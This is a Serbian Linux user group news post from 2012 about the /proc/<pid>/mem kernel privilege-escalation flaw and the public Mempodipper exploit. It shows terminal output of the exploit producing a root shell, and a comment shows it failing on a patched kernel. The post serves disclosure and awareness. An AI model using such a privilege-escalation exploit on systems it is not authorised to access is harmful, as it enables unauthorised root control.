lugons
forum.png
chat
lab.png
planet.png

wiki.png

nopaste.png

galerija.png
kernel

Poslednja stabilna verzija

3.2.11

Poslednja LT verzija

3.0.24

Log in


Forgot your password?
prijatelji LUGoNSa
gnu.gif
gnuzilla-logo.jpg
oootlogo.png
ck13.jpg
zen-kernel
linuxzasve.gif
hulk.jpg
 
You are here: Home Vesti Linux: Preko pristupa virtuelnoj memoriji do root prava

Linux: Preko pristupa virtuelnoj memoriji do root prava

by milobit last modified Jan 24, 2012 05:29 PM
Otkriven novi lokalni sigurnosni propust koji omogućava root prava

Ubrzo pošto je Linus Torvalds prošle nedelje objavio da je rešen problem sa pravima za virtuelnu memoriju pojavio se exploit koji koristi taj propust kako bi se došlo do root prava.

Od verzije 2.6.39 Linux Kernela, podaci svakog procesa mogu biti pregledani i izmenjeni na lokaciji /proc/<pid>/mem. Provere koje se u ovom trenutku vrše se pokazalo da su nedovoljne i lako se mogu zaobići.

Odmah posle objavljivanja ove zakrpe na Nerdling Sapple blogu, pojavio se i funkcionalni exploit. Ovaj expolit manipuliše virtualnom memorijom jednog setuid root procesa i tako omogućava root prava običnom korisniku . Jay Freeman - alias Saurik inače poznat po radu na iPhone-Jailberak okruženju - napravio je funkcionalnu verziju i za Android.

Primer kako doći do root prava:

milobit@blackpearl ~ $ uname -a
Linux blackpearl 3.2.0-gentoo-r1 #1 SMP PREEMPT Sun Jan 8 11:01:16 CET 2012 x86_64 Intel(R) Core(TM)2 CPU T7600 @ 2.33GHz GenuineIntel GNU/Linux
milobit@blackpearl ~ $ ./mempodipper 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/25468/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x401d58.
[+] Calculating su padding.
[+] Seeking to offset 0x401d4c.
[+] Executing su with shellcode.
sh-4.2# whoami
root
sh-4.2# id    
uid=0(root) gid=0(root) groups=0(root),10(wheel),18(audio),19(cdrom),20(dialout),27(video),80(cdrw),85(usb),103(vboxusers),1000(milobit)
sh-4.2#

Exploit pouzdano funkcioniše, što se iz gore priloženog primera može i videti.

 


Info: http://blog.zx2c4.com/749

Document Actions

Comments (1)

milobit Jan 31, 2012 01:27 PM
milobit@blackpearl ~ $ uname -a
Linux blackpearl 3.2.1-gentoo-r2 #1 SMP PREEMPT Tue Jan 31 12:07:56 CET 2012 x86_64 Intel(R) Core(TM)2 CPU T7600 @ 2.33GHz GenuineIntel GNU/Linux
milobit@blackpearl ~ $ ./
Display all 103 possibilities? (y or n)
milobit@blackpearl ~ $ ./m
marijana_slike/ mempodipper movie/
milobit@blackpearl ~ $ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4175/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x401d58.
[+] Calculating su padding.
[+] Seeking to offset 0x401d4c.
[+] Executing su with shellcode.
milobit@blackpearl ~ $
sponzor
E-CAPS doo
Upcoming Events
Linux Install Day - LID Mar 17, 2012 11:00 AM - 02:00 PM — LUGoNS Lab, CK13 Vojvode Bojovica 13
[Virtuelna učionica] Uvod u C [Part 2] Mar 17, 2012 02:00 PM - 03:00 PM — irc://irc.freenode.net/lugons-classroom
BalCCon zagrevanje - part one Mar 23, 2012 - Mar 24, 2012 — Novi Sad
Upcoming events…
« March 2012 »
March
MoTuWeThFrSaSu
1234
567891011
12131415161718
19202122232425
262728293031
lugons projekti

Kako postati haker

slackbook.png
machine

BARBOSSA